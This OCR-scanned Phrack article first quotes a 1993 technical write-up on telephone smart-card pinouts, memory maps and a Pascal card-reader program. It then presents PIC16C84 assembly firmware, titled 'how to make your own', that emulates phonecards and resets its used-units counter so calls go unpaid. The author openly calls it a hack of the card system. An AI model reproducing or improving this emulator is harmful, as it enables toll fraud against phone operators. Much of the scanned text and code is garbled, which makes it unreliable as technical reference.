NB: 
PINOUT: al Vec = 5V 5 Gnd 
------ 2 : R/W 6 Vpp = 21V 
3 >: Clock 7 I/O 
4 : Reset 8 Fuse 
I-4) Main features: 
— Synchronous protocol. 
— N-MOS technology. 
—- 256x1 bit organization. 
- 96 written protected by a lock-out fuse. 
— Low power 85mW in read mode. 
—- 21 V programming voltage. 
—- Access time: 500ns 
- Operating range: -100C +700C 
-— Ten year data retention. 
I-5) TIME DIAGRAMS: 
+21V 
+5V 
+5V 
OV 
+5V 
OV 
+5V 
OV 
+5V 


ISO 


Vpp 


Reset 


Clock 


R/W 
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OV XXXXXXXXXXXXXXXXX XXXXXX XXXXXXXXXXXXXXXXXXXXXX Out 
. . . . . se ae ont oe ee ><---->: 2 


: : : : : :50 ms 50ms : 
Reset Bit 1 Bit2 Bit. 3 
card reading reading Bit2 writing to 1 reading 


I-6) MEMORY MAP of cards from France and Monaco: 


Bytes Bits Binary Hexa 
1 1 --> 8 ---> Builder code. 
2 9 --> 16 0000 OO11 $03 ---> a French telecard 
3 17 --> 24 
4 25 --> 32 
5 33 --> 40 
6 41 --> 48 
7 49 --> 56 
8 57 --> 64 
9 65 --> 72 
10 73 --> 80 
11 81 --> 88 
LD 33 --> 40 0001 0011 $13 -—--> 120 units card 
0000 0110 S06 ---> 50 units card 
0000 0101 $05 ---> 40 units card 
13-31 97 --> 248 —--> The units area: each time a unit 
is used, then a bit is set to "1"; 
Generally the first ten units are 
fused in factory as test. 
32 249 --> 256 i al Bestia pd Bl SFF ---> the card is empty 


I-7) MEMORY MAP of the other cards: 


Bytes Bits Binary Hexa 
1 1 --> 8 
2 9 --> 16 1000 0011 $83 ---> a telecard 
3-4 17 --> 32 1000 0000 $80 0001 0010 | $12 | ---> 10 units card 
0010 0100 | $24 | ---> 22 units card 
0010 0111 | $27 | ---> 25 units card 
0011 0010 | $32 | ---> 30 units card 
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0101 0010 | $52 | ---> 50 units card 
1000 0010 | $82 | ---> 80 units card 
1000 0001 $81 0000 0010 | $02 | ---> 100 units card 
0101 0010 | $52 | ---> 150 units card 
5 33 --> 40 
6 41 --> 48 
7 49 --> 56 
8 57 --> 64 
9 65 --> 72 
10 73 --> 80 
11 81 --> 88 
i 89 --> 96 0001 1110 S1E —--> Sweden 
0010 0010 $22 ---> Spain 
0011 0000 $30 —--> Norway 
0011 0011 $33 -—--> Andorra 
0011 1100 $3C ---> Ireland 
0100 O111 S47 ---> Portugal 
0101 0101 $55 > Czech Republic 
0101 1111 SSF —--> Gabon 
0110 0101 $65 ---> Finland 
13-31 97 --> 248 —--> The units area: each time a unit 
is used, then a bit is set to "1"; 
Generally the first two units are 
fused in factory as test. 
32 249 --> 256 0000 0000 $00 


II ) The cards from OD 


S, Gieseck 


& Devrient, 


ORGA Karten systeme, 


Uniqua, Gemplus, 


Schlumberger and Oldenbourg Kartensysteme: 


II-1) Introduction 


These cards are in fact 128 bit memory in NMOS technology, and 
the map of these cards are the following: 


64 bit 
40 bit EEPROM (5x8 bits). 
24 bits set to "1". 


ITI-2) Pinout: 


ISO 7816-2 


EPROM written protected 


‘} 


(manufacturer area). 


Vcc = 5V 5: 2-Gnd 
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i) 
w 
0) 
n 
0) 
ct 
Oy 
=) 
Q 


pe See Ee | | --------4 t 3 Clock 7 I/O 
3 | | 7 4 nee. 8 Aes 
+----+---- + 
6 SS / \-------4 t n.c. : not connected 
4 8 


II-3) Main features: 


- ISO 7816- 1/2 compatible. 

—- use a single 5V power supply. 
— low power consumption. 

— NMOS technology. 


II-4) Time Diagrams: 


The address counter is reset to 0 when the clock line CLK is raised 
while the control line R is high. Note that the address counter can not 
be reset when it is in the range 0 to 7. 


Reset 
_—- er es ——! | Clk 
n | 0 : | 1 | 2 | : | 4 2 (Address) 
SSS | Data 


Bit n Bit 0 Bit 1 Bit2 Bit3 

The address counter is incremented by 1 with each rising edge of the 
clock signal Clk, for as long as the control line R remains low. The 
data held in each addressed bit is output to I/O contact each time Clk 
falls. It is not impossible to decrement the address counter, therefor 
to address an earlier bit, the address counter must be reset then 
incremented to require value. 


All unwritten or erased bits in the address 64-104 may be unwritten 
to. When a memory cell is unwritten to, it is set to 0. The addressed 
cell is unwritten to by the following sequence. 


1- R is raised while Clk is low, to disable address counter increment 
for one clock pulse. 


2- Clk is then raised for a minimum of 10ms to write to the address bit. 
When to write operation ends, and Clk falls, the address counter is 
unlocked, and the content of the written cell, which is now 0, is output 


to I/O contact if the operation is correct. 


The next Clk pulse will increment the address by one, then the writ 
sequence can be repeated to write the next bit. 


Reset 
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Clk 
n | n+1 n+2 A n+3 : (Addr) 
, . , . , . . fe . 
XXX_XXXXXXXXXXXXXXXXXXX XX XXXXXXXXXXXXXXXXXXXXXXX I/O 
n nt+1 : : nt+1 nt+2 : : 
write write 
WriteCarry: 
A counter is erased by performing the WRITECARRY sequence on the 
stage of the next highest weighing to that to be erased. 
The writecarry sequence is as follows: 
1 Set the address counter to an unwritten bit in the next highest 
counter stage to that to be erased. 
2 -—- Increment is disabled on the following rising edge of R where Clk 
remains low. 
3 - Clk is then raised for a minimum of 10ms, while R is low, to write 
to the next address bit. 
4 - R is the raised again while Clk remains low to disable increment a 
second time. 
5 - Clk is the raised for a minimum of lms, while R is low, to write to 
the addressed bit a second time, erasing the counter level immediately 
below that the addressed bit. 
Rst 
aa Clk 
< address n Sr< nt+1 
XXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX XX I/O 
: + on : : n nt+1 
Write Erase 
II-5) Memory Map: 
Bytes Bits Binary Hexa 
1 I! SS 8 
2 9 --> 16 0010 1111 S2F —--> Germany 
0011 0111 $37 —--> Netherland 
0011 1011 $3B —--> Greece 
3 17 --> 24 
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4 25 -- +>! 32 ---> Issuer area (written protected) 
5 33 --> 40 
6 41 --> 48 
7 49 --> 56 
8 57 --> 64 
9 65 --> 72 —---> c4096 ) 
10 73 --> 80 sHS>. (C512 ) 
11 81 --> 88 ---> c64 ) 5 stage octal counter 
12 89 --> 96 =-=> eS 4) 
13 97 --> 104 -—--> cO ) 
4 105 --> 112 TAA TAAL SFF 
is) P1:3.-=+> ‘120 1111 1111 SFF -—--> area of bits set to "1" 
6 120 --> 128 PAD AAT, SFF 


The Issuer area: 


This issuer consists of 40 bits. The contents of the issuer area ar 
specified by the card issuer, and are fixed during the manufacturing 
process. The contents of the issuer area will include data such as 
serial numbers, dates, and distribution centers. 


[This area may only be read. 


The Counter area: 


The counter area stores the card’s units. Its initial value is 
specified by the card issuer and set during manufacturing. 


The counter area is divided into a 5 stage abacus. 


Note that you can only decrease the counter and it is not authorized to 
write in the counter a value greater than the old value. 


I-6) Electrical features: 


Maximum ratings: 


Symbol Min Max Unit 
Supply voltage Vec -0..3 6 Vv 
Input voltage Vss =0.23, 6 Vv 
Storage temperatur Tstg -20 +55 OC 
Power dissipation | Pd | - | 50 | mw | 


DC characteristics: 


Symbol Min.| Typ.| Max.| Unit 


Supply current Lec - = =) mA 


Input Voltage (low) vi 0 - 02:8 Vv 


Input voltage (high) Vh 32:5 = Vcc Vv 
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Input current R Th = = 100 uA 
Input current Clk Tl = = 100 uA 
Output current (Vol=0.5V) Tol 7 - 10 uA 
Output current (Voh=5V) Ioh - 7 0.5 mA 
AC characteristics: 
Symbol Min. Max. Unit 
Pulse duration tr 50 = us 
R address reset 
Pulse duration ts 10 - us 
R write 
High level Clk th 8 - us 
Low level Clk tl 12 - us 
Write window Twrite 10 = ms 
Erase window Terase 10 = ms 
tvl1 5 acd us 
tv2 3) = us 
tv3 oes) - us 
tv4 3.) = us 
EWS 345 = us 
tv6 5 - us 
tv7 5 oF us 
tv8 10 - us 
III) The Reader Schematic: 
External 5V (Optional) 
5V o----7-7- i 
/ T2 PNP d1i3 r7 10 
OV o--, / BC 177 I\ | 
| pease ef “eras S=> E C .--| >4+-[ ]--- 
= He | | \ i |/ | 
\\A\A\\ | Battery | \ i 
- 22.5V fo * SS SSS aS 
Be abate | | | —— 
th ol i rexel fic, 
D2 \\A\A\A\ r6 150k x5 15k | 
4 0 * | 
| r3 220k Kus 
Ack | |/ Tl -— NPN 
10 o P| Jakeo BC107 
a | \ 
or or +--[ at \ Ei 


a 
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| |x2 [ted | r4 390k 
| [220 | [22k te es ee 
[La (2s \\A\A\A\ \\A\A\\ 
I\ | 
* | >4 * 
|/ | , | 
dl | | , , 
| Rin SE RS Reset * 
| 
BO |  ,-l---|--* I/O | Clk *-- 
20 | | 
| '---|--*  Vpp | R/W *-- ---- 
Busy | 
Ly © nee * Gnd 5V 7m 
| 7 | 
D1 a eee Chip connector | 
36 , \\A\A\\ | 
| 
Str I\ | | 
ali fe) * | >4 * * * * * , 
d2|/ | d3 d4 d5 d6é a7 
pon ofoXe SEN ALN! of 
D3 \ d8 
5 oO 7 > * 
/ 
D4 \ dag 
60 * > * 
/ 
D5 \ dio 
7-0 * > * 
/ 
D6 \ dil 
8 0 * > * 
/ 
D7 \ di2 
90 * > t 
/ 
25° O- FS c 5S : 
| 
sb, ghehecnts | dil to d13: 1N4148 
a 
\\A\A\\ 


Centronics port 


IV) The program: 


build the reader. 


cut here 


(begin) 


The following program will enable you to read telecards on you PC if you 


{eR EIR RRR A ORK ROR RR CRORES RRR BARA ARR KER BERR ARK BRR BBR ER RR RR KR RR BRR BRR R RK KER I RR EY 


{ 


T 


ELE 


GC ALR. -D 


PAS 


} 


ERE AKA AR FOR ROR KA AOR IK, FER RR AER KIER TGR RRA, RK KR KR AOR AR IIS RRR BR AE KERR SRR RR ARAL LR ROR KR AA KER Fh 


{ This program enable you to dumb the memory of el] 
{ from all over the world, 


so that you will b 


abl 


{ the card is from how many units are left and so on 


to s 


lectronics phonecards 
which country 


} 
} 
} 
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PR ORAS AIR TRO RA SR BAO KR RIAA A PATRIA RATA RIA KOR RRR RVR IR RR TAS BRIER ROK ANA I PAIR, ROR VASA RASH ORR RANA VATE KR VANE 


Written by Stephane BAUSSON (1993) 


Email: sbausson@ensem.u-nancy.fr 


Snail Mail Address: 4, Rue de Grand 
F-88630 CHERMISEY 
France 


CSUR GOS Ee ES 


} 


RARE AER RL REE RARE RE, RR AOR RM BRK BERET AR RK ROAR ABA IIR RE KERR LOI RT RE RN ALE ARR IA RT: | 


* Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi) * } 


BERR RRA EAR ICR AOR BR REL RRR IKE EB BRR LR KE TER BRR EK BRR RE BR KE IER ERR FOR AA BRR RR RRA RES FN 


USES crt,dos; 


CONST port_address=$378; { lprl chosen } 


TYPE string8=string[8]; 
string2=string[2]; 


VAR reg : registers; 
i,j : integer; 
Data : array[1..32] of byte; 
car : char; 
byte_number : integer; 
displaying : char; 


PROCEDURE Send(b:byte) ; 


GIN port [port_address]:=b; 
D 


Z wl 


7’ 


{ } 


FUNCTION Get:byte; 


BEGIN get:=port [port_address+1]; 
END; 


FUNCTION dec2hexa_one (decimal_value) :hexa_character_representation,; 


—- convert a 4 bit long decimal number to hexadecimal. 


SAAS 
ea oS ee Cee 


FUNCTION dec2hexa_one (value:byte) :char; 


BEGIN case value of 


0..9 : dec2hexa_one:=chr (value+$30); 
10..15 : dec2hexa_one:=chr (value+$37) ; 
END; 


END; 


FUNCTION d2h(decimal_byte) :string2; 


— convert a decimal byte to its hexadecimal representation. 


SAAN AS 
Ger Or Cae 


FUNCTION d2h(value:byte) :string2; 


VAR msbb, lsbb:byte; 


BEGIN msbb:=0; 
if ( value >= $80 ) then 
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BEGIN msbb:=msbb+8; 
value:=value-$80; 

END; 

if ( value >= $40 ) then 

BEGIN msbb:=msbb+4; 
value:=value-S$40; 

END; 

if ( value >= $20 ) then 

BEGIN msbb:=msbb+2; 
value:=value-$20; 

END; 

if ( value >= $10 ) then 

BEGIN msbb:=msbb+1; 
value:=value-$10; 

END; 

lsbb:=0; 

if ( value >= $08 ) then 

BEGIN lsbb:=l1sbb+8; 
value:=value-S$08; 

END; 

if ( value >= $04 ) then 

BEGIN lsbb:=lsbb+4; 
value:=value-$04; 

END; 

if ( value >= $02 ) then 

BEGIN lsbb:=l1sbb+2; 
value:=value-$02; 

END; 

if ( value >= $01 ) then 

BEGIN lsbb:=lsbb+1; 
value:=value-$01; 

END; 

d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb) ; 


eal 
Z 
is) 


{ 


Function Binary( b : byte) :string8; 


var wel 
s 


while (weight > 0) do 

BEGIN if ((b and weight) = weight) 
else s:=st’0’; 
weight:=weight div $02; 

END; 

Binary:=s; 


{ 


ght 


byte; 
string8; 


BEGIN weight:=$80; 


e—/JI. 
sralr; 


then s:=st’1’ 


FUNCTION Units:byte; 


i 


integer; 
string8; 


(Data[i] = $FF) do 


u:=ut8; 
i:=it1; 


:=Binary(Data[i]); 
hile(s[1l]=’1’) do 
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BEGIN inc(u); 
s:=copy(s,2,length(s))j; 


END; 
units:=u; 


function Units_2:LongInt; 


BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13]; 
END; 


PROCEDURE Card_Type; 


BEGIN case Data[2] of 
$03: BEGIN write(’Telecard France — '); 
case Data[12] of 
$13: write(’120 Units - ’,units-130,’ Units left’); 
$06: write(’50 Units - ’,units-60,’ Units left’); 
$15: write(’40 Units - ’,units-40,’ Units left’); 


END; 
END; 
S2F:BEGIN write(’Telecard Germany - ’, Units_2, ’ Units left’); 
END; 
$3B:BEGIN write(’Telecard Greec re Units 2, "% Units Tete’); 
END; 
$83:BEGIN write(’Telecard’ ); 
case Data[12] of 
S1E: write(’ - Sweden’); 
$30: write(’ — Norway’); 
$33: write(’ - Andorra’); 
$3C: write(’ - Ireland’); 
S47: write(’ -— Portugal’); 
$55: write(’ Czech Republic’); 
SSF: write(’ - Gabon’); 
$65: write(’ - Finland’); 
END; 
if (Data[12] in [$30,$33,$3C,$47,555,$65]) then 
BEGIN case ((Data[3] and SOF)*S100+Data[4]) of 
$012: write (’ - 10 Units - ’,units-12,’ Units left’); 
$024: write (’ - 22 Units - ’,units-24,’ Units left’); 
$027: write (’ - 25 Units - ’,units-27,’ Units left’); 
$032: write (’ - 30 Units - ’,units-32,’ Units left’); 
$052: write (’ - 50 Units - ’,units-52,’ Units left’); 
$067: write (’ - 65 Units - ’,units-62,’ Units left’); 
$070: write (’ - 70 Units - ’,units-70,’ Units left’); 
$102: write (’ - 100 Units - ’,units-102,’ Units left’); 
$152: write (’ - 150 Units - ',units-152,’ Units left’); 
END; 
END; 
{ write(’ - NO ’,Data[5]*$100+Data[6]);} 
END; 
END; 


tf 
Z 
iw) 


{ } 


PROCEDURE waiting; 


BEGIN send($00) ; 

write(’Enter a card in the reader and press a key ...’); 
repeat until key pressed; 

gotoxy(1l, wherey); 

clreol; 


END; 
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{ } 


PROCEDURE Full_Displaying; 


BEGIN writeln(’Memory dump:’); 
for i:=1 to 80 do write(’-’); 
for i:=1 to (byte_number div 6 + 1) do 
BEGIN for j:=1 to 6 do 
BEGIN if j+6*(i-1) <= byte_number then write (binary (Data[j+6*(i-1)]):9); 
END; 
gotoxy (60,wherey) ; 
for j:=1 to 6 do 
if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),’ '); 
writeln; 


END; 

for i:=1 to 80 do write(’-’); 
Card_Type; 

writeln; 


PROCEDURE Short_Displaying; 


VAR j : integer; 


BEGIN for j:=1 to byte_number do 
BEGIN write(d2h(Data[j]),’ ’); 
END; 

writeln; 


PROCEDURE Reading; 


VAR i, Jj  : integer; 
Value : byte; 


BEGIN send(S$FE) ; 

send (SF8); 

for 2s=L to.32:-do 
BEGIN Value:=0; 

for j:=1 to 8 do 


GJ 


BEGIN Value:=Value*$02 + ((get and $08) div $08); 
send (SFB); 
delay (1); 
send(SF8); 

END; 


Data[i] :=Value; 
END; 
case displaying of 
'F’ :full_displaying; 
'S’ :short_displaying; 
END; 


PROCEDURE writing; 


VAR i,n:integer; 
car:char; 


BEGIN write(’Which bit do you want to set to "1": ’); 
readln(n); 


displaying:='F’; 
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waiting; 
car:=readkey; 
send (SFA); 
send (SF8); 
for i:=1 to n do 
BEGIN send(SF9); 
if i=n then 
BEGIN send(S$FD) ; 
delay (20); 
send (SFF) ; 
delay (20); 
END; 
send (SFB); 
END; 
reading; 
END; 
PROCEDURE Saving; 
VAR filename string; 
te : text; 
i : word; 

BEGIN write(’Enter the filenam oye 
readlin(filename) ; 
assign(f, filename); 
rewrite (f); 
for i:=1 to byte_number do write(f,d2h(Data[i]),’ ’); 
close(f); 

END; 

PROCEDURE initialize; 

VAR i integer; 

BEGIN byte_number:=32; 


clrscr; 

writeln(’ 1 - to dump a 256 bits card’); 
writeln(’ 2 -—- to dump a 128 bits card’); 
writeln(’ F - to display in full format’); 
window (41,1,80,25); 

writeln(’ S - to display in short format’); 
writeln(’ F2 - to save ina file’); 
writeln(’ Q - to exit the program’); 


window(1,4,80,25); 


for i:=1 to 80 do write(’="’); 


window(1,5,80,25); 
END; 


EGIN initialize; 
repeat waiting; 


car:=upcase (readkey) ; 
case car of 
'W’ :writing; 
Ors. s 
‘1’ :byte_number:=32; 
'2'’ :byte_number:=16; 


'F’,'S’ :displaying:=car; 
#00: BEGIN car:=readkey; 


if car=#60 then 


saving; 
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END; 
else reading; 
END; 
until car='Q’; 


cut here (end) 


Ba pen ee ae) eek Stephane BAUSSON 
hala fof Of Engineering student at ENSEM (Nancy - France) 
2h fe fey Smail: 4, Rue de Grand, F-88630 CHERMISEY, France 
fff aef 7, 
af 2h sf 2p eF Email: sbausson@ensem.u-nancy.fr 


<End of text quoted from Stephane Bausson’s text about the telephone cards>. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 11 of 18 


Electronic Telephone Cards: How to make your own! 


(continued) 


The Program: 

Well, when I saw this phile about the cards the first time, about a year 
ago I quickly realized that this system is very unsecure and really 
needs to be hacked. So, now I present you with a piece of software for 
the PIC 16C84 RISC micro-controller from Microchip that will take care 
of emulating the cards used by Schlumberger and others. This system is 
to be found in Scandinavia (Sweden, Norway and Finland), Spain, France 
and other countries. I do know that France probably needs some small 
modifications for this to work, but I see no reason to as why it 
shouldn’t do so! For this to work, you need to have access to a PROM 
burner which can handle the PIC 16C84, or you might just build one 
yourself as I include some plans for that in the UUEncoded block to be 
found at the end of this phile. First of all, you have to read off the 
first 12 bytes of data from a valid card from the country you wish your 
emulator to work in. This because I don’t think it would be a good idea 
to publish stolen card identities in Phrack. Then you simply enter those 
12 bytes of data in the proper place in my program and compile it. 
That’s it... And since I happen to choose a version of the PIC with 
nternal Data EEPROM, that means that the first 12 locations of the Data 
EPROM should contain the card id bytes. As of today this code should 
work smooth and fine, but maybe you’1ll need to modify it later on when 
Schlumberger gets tired of my hack. But since the PIC is a very fast and 
powerful micro-controller it might be quite hard for them to come up 
with a solution to this problem. Let’s have a look at the PIC Software! 
(Note that the current version of Microchip’s PICSTART 16B package is 
unable to program the DATA EEPROM array in the 16C84 so if you are going 
to use that one, use the other version of the source code which you’1ll 


bb: 


find in the UUEncoded part!). 

<Start of TELECARD.ASM>. 
TITLE "ISO 7816 Synchronous Memory Card Emulator" 
LIST P=PIC16C84, R=HEX 
INCLUDE "PICREG.EQU" 


; PIC16C84 I/O Pin Assignment List 


CRD_CLK equ 0 ; RBO + RA4 = Card Clock 

CRD_DTA equ ) ; RAO = Card Data Output 

CRD_RST equ A ; RB1l = Card Reset, Low-Active 
CRD_WE equ 7 ; RB7 = Card Write-Enable, Hi-Activ 


; PIC16C84 RAM Register Assignments 


CRD_ID equ 0x00c ; Smartcard ID, 12 bytes 
FUSCNT equ 0x018 ; Fused units counter 
BITCNT equ 0x019 ; Bitcounter 

LOOPCNT equ OxOla ; Loop Counter 

EE_FLAG equ Ox01b ; EEPROM Write Flag 

EMP 1 equ OxOlc ; Temporary Storage #1 

EMP 2 equ Ox0l1d ; Temporary Storage #2 

EMP 3 equ OxOle ; Temporary Storage #3 

EMP 4 equ Ox01f ; Temporary Storage #4 
TEMP_W equ Ox02e ; Temporary W Save Address 
TEMP_S equ Ox02f ; Temporary STATUS Save Address 
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org 0x2000 ; Chip ID Data 

dw 042,042,042,042 

org 0x2007 ; Configuration Fuses 

dw B’ 00000001" 

org 0x2100 ; Internal Data EEPROM Memory (Card ID!!!) 

db 0x081,0x042,0x000,0x011,0x022,0x033 

db 0x044,0x055, 0x066, 0x077,0x011,0x084 

db 0x002 ; Default used up credits value 

org PIC84 ; Reset-vector 

goto INIT ; Jump to initialization routine 

org INTVEC ; Interrupt-vector 

push ; Save registers 

call INTMAIN ; Call main interrupt routine 

pop ; Restore registers 

retfie ; return from interrupt & clear flag 

org 0x010 ; Start address for init rout. 
INIT bsf STATUS, RPO ; Access register bank 1 

clrwdt ; Clear watchdog timer 

movilw B’ 11101000’ ; OPTION reg. settings 

movwft OPTION ; Store in OPTION register 

movilw Belay aT. 10% ; Set PORT A Tristate Latches 

movwf TRISA ; Store in PORT A tristate register 

movilw B’11111111’ ; Set PORT B Tristate Latches 

movwf TRISB ; Store in PORT B tristate register 

bcf STATUS, RPO ; Access register bank 0 

olen a RTCC ; Clear RTCC 

clrf PORTA ; Clear PORTA 

GLEE PORTB ; Clear PORTB 

moviw 0d ; 13 bytes to copy 

movwft LOOPCNT ; Store in LOOPCNT 

movilw Oc ; Start storing at S$0c in RAM 

movwft FSR ; Store in FSR 

clrf EEADR ; Start at EEPROM Address 0 
EECOPY 

bsf STATUS, RPO ; Access register bank 1 

bsf EECON1, RD ; Set EECON1 Read Data Flag 

bef STATUS, RPO ; Access register bank 0 

moviw EEDATA ; Read one byte of EEPROM Data 

movwf INDIR ; Store in RAM pointed at by FSR 

incf FSR ; Increase FSR pointer 

incf EEADR ; Increase EEPROM Address Pointer 

decfsz LOOPCNT,1 ; Decrease LOOPCNT until it’s 0 

goto ERECOPY ; Go and get some more bytes! 

bsf STATUS, RPO ; Access register bank 1 

bef EKECON1, EEIFE ; Clear EEPROM Write Int. Flag 

bef EECON1,WREN ; EEPROM Write Disable 

bcf STATUS, RPO ; Access register bank 0 

moviw B’ 10010000’ ; Enable INT Interrupt 

movwft INTCON ; Store in INTCON 
MAIN bsf STATUS, RPO ; Access register bank 1 

btfsc EECON1,WR ; Check if EEPROM Write Flag Set 

goto MAIN ; Skip if EEPROM Write is Completed 

bef EECON1, EEIF ; Reset Write Completion Flag 

DCE EECON1,WREN ; EEPROM Write Disable 

bcf STATUS, RPO ; Access register bank 0 

btfss BE FLAG, LSB ; Check for EEPROM Write Flag 

goto MAIN ; If not set, jump back and wait some more 

Cert EE FLAG ; Clear EEPROM Write Flag 

moviw Oc ; Units is stored in byte $0c 

movwft EEADR ; Store in EEPROM Address Counter 

movfw FUSCNT ; Get fused units counter 

movwt EEDATA ; Store in EEDATA 
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bsf STATUS, RPO ; Access register bank 1 

bsf EECON1, WREN ; EEPROM Write Enable 

bef INTCON, GIE ; Disable all interrupts 

movlw 055 ; Magic Number #1 for EEPROM Write 

movwft EECON2 ; Store in EECON2 

movlw Oaa ; Magic Number #2 for EEPROM Write 

movwt EECON2 ; Store in EECON2 

bsf EECON1,WR ; Execute EEPROM Write 

bsf INTCON, GIE ; Enable all interrupts again! 

bcf STATUS, RPO ; Access register bank 0 

goto MAIN ; Program main loop! 
INTMAIN btfsc INTCON, INTF ; Check for INT Interrupt 

goto INTMAIN2 ; If set, jump to INTMAIN2 

movilw B’ 00010000’ ; Enable INT Interrupt 

movwft INTCON ; Store in INTCON 

return 
INTMAIN2 

bcf STATUS, RPO ; Access register bank 0 

bsf PORTA, CRD_DTA ; Set Data Output High 

btfsc PORTB, CRD_RST ; Check if reset is low 

goto NO_RST ; If not, skip reset sequenc 

movftw RTCC ; Get RTCC Value 

movwft EMP4 ; Store in TEMP4 

CLreé RTCC ; Clear RTCC 

movilw 055 ; Subtract $55 from TEMP4 

subwf TEMP 4,0 ; to check for card reset.... 

bnz NO_RST2 ; If not zero, jump to NO_RST 

moviw 02 ; Unused one has $02 in FUSCNT 

movwft FUSCNT ; Store full value in FUSCNT 

bsf BE FLAG, LSB ; Set EEPROM Write Flag 
NO_RST2 bcf INTCON, INTF ; Clear INT Interrupt Flag 

return ; Mission Accomplished, return to sender 
NO_RST movfw RTCC ; Get RTCC Value 

movwft BITCNT ; Copy it to BITCNT 

movwt TEMP 1 ; Copy it to TEMP1 

movwf TEMP 2 ; Copy it to TEMP2 

moviw 060 ; Load W with $60 

subwf TEMP1,0 ; Subtract $60 from TEMP1 

bz CREDI ; If it is equal to $60 

be CREDI ; or greater, then skip to units area 

rrf TEMP 2 ; Rotate TEMP2 one step right 

rrf TEMP 2 ; Rotate TEMP2 one step right 

rrf TEMP 2 ; Rotate TEMP2 one step right 

moviw Of ; Load W with Sf 

andwf TEMP2,1 ; And TEMP2 with W register 

movfw EMP 2 ; Load W with TEMP2 

addlw Oc ; Add W with $0c 

movwft FSR ; Store data address in FSR 

movfw INDIR ; Get data byte pointed at by FSR 

movwft EMP 3 ; Store it in TEMP3 

movilw 07 ; Load W with $07 

andwf TEMP1,1 ; And TEMP1 with $07 

bz NO_ROT ; If result is zero, skip shift loop 
ROTLOOP rlf EMP 3 ; Shift TEMP3 one step left 

decfsz EMP1,1 ; Decrement TEMP1 until zero 

goto ROTLOOP ; If not zero, repeat until it is! 
NO_ROT btfss TEMP3,MSB ; Check if MSB of TEMP3 is set 

bcf PORTA, CRD_DTA ; Clear Data Output 

bcf INTCON, INTF ; Clear INT Interrupt Flag 

return ; Mission Accomplished, return to sender 
CREDIT btfss PORTB, CRD_WE ; Check if Card Write Enable is High 

goto NO_WRT ; Abort write operation if not... 

btfss PORTB, CRD_RST ; Check if Card Reset is High 

goto NO_WRT ; Abort write operation if not... 
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incf 
bsf 
bcf 
return 


movilw 
subwf 
movftw 
subwf 
bne 
bef 
DCE 
return 


END 


FUSCNT 
EE FLAG, LSB 
INTCON, INTF 


060 
BITCNT, 1 
FUSCNT 
BITCNT, 1 
FUSED 

PORTA, CRD_DTA 
INTCON, INTF 


Increase used-up units counter 

Set EEPROM Write-Flag 

Clear INT Interrupt Flag 

Mission Accomplished, return to sender 


Load W with $60 

Subtract $60 from BITCNT 
Load W with FUSCNT 
Subtract FUSCNT from BITCNT 

If result is negative, unit is fused 
Clear Data Output 

Clear INT Interrupt Flag 

Mission Accomplished, return to sender 


<End of TELECA 


<Start of PICRE 


; PIC16Cxx Micro-controller Include File 


PIC54 
PIC55 
PIC56 
PLCS 7 
PIC71 
PIC84 
INTVEC 


IND 


PCL 


RTCC 


IR 


STA 


TUS 


ry 
ie 
Bs 
1p) 
eal 


equ Oxlff 
equ Oxlff 
equ Ox3ff 
equ Ox7ff 
equ 0x000 
equ 0x000 
equ 0x004 
equ 0x000 
equ Ox001 
equ 0x002 
equ 0x003 
equ 0x004 
equ 0x005 
equ 0x006 
equ 0x007 
equ 0x008 
equ 0x009 
equ 0x008 
equ 0x009 
equ Ox00a 
equ 0x00b 
equ 0x005 
equ 0x006 
equ 0x007 
equ 0x008 
equ 0x008 
equ 0x009 
equ Ox001 
equ 0x007 
equ 0x000 
equ 1 

equ dl 

equ 0 

equ 0 


; Status Register (f03) Bits 


CARRY 


C 


DCARRY 


DC 
Z_B 


IT 


equ 0x000 
equ 0x000 
equ Ox001 
equ 0x001 


equ 0x002 


PIC16C54 Reset Vector 
PIC16C55 Reset Vector 
PIC16C56 Reset Vector 
PIC16C57 Reset Vector 
PIC16C71 Reset Vector 
PIC16C84 Reset Vector 
PIC16C71/84 Interrupt Vector 


Indirect File Reg Address Register 
Real Time Clock Counter 

Program Counter Low Byte 

Status Register 

File Select Register 

Port A I/O Register 

Port B I/O Register 

Port C I/O Register 

PIC16C71 A/D Control Reg 0 
PIC16C71 A/D Converter Result Register 
PIC16C84 EEPROM Data Register 
PIC16C84 EEPROM Address Register 
Program Counter High Bits 
Interrupt Control Register 

Port A I/O Direction Register 
Port B I/O Direction Register 
Port C I/O Direction Register 
PIC16C71 A/D Control Reg 1 
PIC16C84 EEPROM Control Reg. 1 
PIC16C84 EEPROM Control Reg. 2 
Option Register 


cz! 


r5 


3 


Most-Significant Bit 
Least-Significant Bit 


Carry Bit 
Carry Bit 
Digit Carry Bit 
Digit Carry Bit 
Zero Bit 
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Z equ 
P_DOWN equ 
PD equ 
T_OUT equ 
TO equ 
RPO equ 
RP1 equ 
IRP equ 
; INTCON Register (f0b) 
RBIF equ 
INTF equ 
RTIF equ 
RBIE equ 
INTE equ 
RTIE equ 
ADIE equ 
EEIE equ 
GIE equ 
; OPTION Register (f81) 
PSO equ 
PS1 equ 
PS2 equ 
PSA equ 
RTE equ 
RTS equ 
INTEDG equ 
RBPU equ 
; ADCONO Register (£08) 
ADON equ 
ADIF equ 
ADGO equ 
CHSO equ 
CHS1 equ 
ADCSO equ 
ADCS1 equ 
; ADCON1 Register (f88) 
PCFGO equ 
PCFG1 equ 
; EECON1 Register (f88) 
RD equ 
WR equ 
WREN equ 
WRERR equ 
EEIF equ 
; Some useful macros... 
PUSH macro 
movwft EMP_W 
swapf STATUS,W 
movwft TEMP_S 
endm 
POP macro 
swapf TEMP_S,W 
movwft STATUS 
swapf EMP_W 
swapf TEMP_W,W 


0x002 
0x003 
0x003 
0x004 
0x004 
0x005 
0x006 
0x007 


Bits 


0x000 
Ox001 
0x002 
0x003 
0x004 
0x005 
0x006 
0x006 
0x007 


Bits 


0x000 
Ox001 
0x002 
0x003 
0x004 
0x005 
0x006 
0x007 


Bits 


0x000 
Ox001 
0x002 
0x003 
0x004 
0x006 
0x007 


Bits 


0x000 
Ox001 


Bits 


0x000 
Ox001 
0x002 
0x003 
0x004 


Zero Bit 


Power Down Bit 
Power Down Bit 
Watchdog 1 
Watchdog Time- 


Time-Out 


Bit 
Bit 
et. 


Out 
